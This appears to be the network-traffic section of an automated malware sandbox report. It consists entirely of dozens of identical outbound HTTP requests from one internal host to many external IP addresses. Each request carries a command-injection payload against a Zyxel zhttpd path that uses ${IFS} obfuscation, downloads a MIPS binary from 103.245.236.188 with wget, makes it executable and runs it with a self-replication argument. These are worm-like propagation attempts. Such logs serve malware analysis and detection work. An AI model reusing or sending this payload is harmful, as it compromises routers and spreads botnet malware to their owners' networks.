                                                Jan 12, 2024 18:24:51.226399899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8252192.168.2.1338106211.203.21.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226433039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8253192.168.2.1347336136.155.57.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226484060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8254192.168.2.1354184130.6.211.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226515055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8255192.168.2.1334484205.7.92.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226545095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8256192.168.2.1333586205.35.170.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226594925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8257192.168.2.1358532146.95.248.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226629019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8258192.168.2.1358590110.44.148.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226671934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8259192.168.2.1338206156.15.81.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226716995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8260192.168.2.1342334137.252.109.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226766109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8261192.168.2.1349686210.129.202.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226792097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8262192.168.2.134661261.118.100.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226835012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8263192.168.2.1350698213.121.124.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226855040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8264192.168.2.134569624.145.212.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226896048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8265192.168.2.134853252.186.61.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226948977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8266192.168.2.1346406149.131.254.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226989031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8267192.168.2.1354162200.99.122.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227025032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8268192.168.2.1335098155.79.24.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227061987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8269192.168.2.1360008199.31.13.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227109909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8270192.168.2.1339746119.58.85.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227152109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8271192.168.2.1356768209.63.211.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227175951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8272192.168.2.13512181.177.240.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227216959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8273192.168.2.1352754174.24.157.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227237940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8274192.168.2.134955663.242.34.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227288008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8275192.168.2.1355464160.37.151.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227318048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8276192.168.2.135892219.59.68.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227354050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8277192.168.2.1334604191.79.88.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227412939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8278192.168.2.1334828133.235.86.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227446079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8279192.168.2.1352148193.155.172.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227489948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8280192.168.2.1343570133.83.21.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227509975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8281192.168.2.1347522130.77.69.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227571011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8282192.168.2.1360846173.239.4.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227593899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8283192.168.2.1354528150.237.139.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227644920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8284192.168.2.135342651.155.30.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227679014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8285192.168.2.133961413.44.18.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227709055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8286192.168.2.1345366181.63.20.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227727890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8287192.168.2.1342266194.199.64.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227798939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8288192.168.2.135143231.48.75.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227828026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8289192.168.2.1356012103.78.159.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227868080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8290192.168.2.135942041.129.179.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227905989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8291192.168.2.1345606184.85.114.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227931976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8292192.168.2.135337076.190.73.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.227982044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8293192.168.2.134865251.106.13.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228037119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8294192.168.2.1336758109.189.52.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228091955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8295192.168.2.133814285.227.246.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228120089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8296192.168.2.133686890.147.59.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228142023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8297192.168.2.1337782213.195.77.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228169918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8298192.168.2.134345861.98.202.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228219986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8299192.168.2.133831620.223.112.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228251934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8300192.168.2.1348614157.23.9.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228303909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8301192.168.2.1354138167.4.90.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228346109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8302192.168.2.133925450.129.69.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228367090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8303192.168.2.1343410134.193.200.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228425026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8304192.168.2.1340354101.194.92.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228461981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8305192.168.2.1359948189.121.255.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228506088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8306192.168.2.135895439.174.167.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228543997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8307192.168.2.1353428162.213.50.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228595018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8308192.168.2.1338704147.168.118.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228637934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8309192.168.2.135554641.219.39.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228693962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8310192.168.2.133703063.119.48.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228696108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8311192.168.2.1359740164.9.136.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228729963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8312192.168.2.1359156171.198.60.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228791952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8313192.168.2.1349658171.122.114.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.228827000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8314192.168.2.1352330111.122.167.108443
                                                TimestampBytes transferredDirectionData
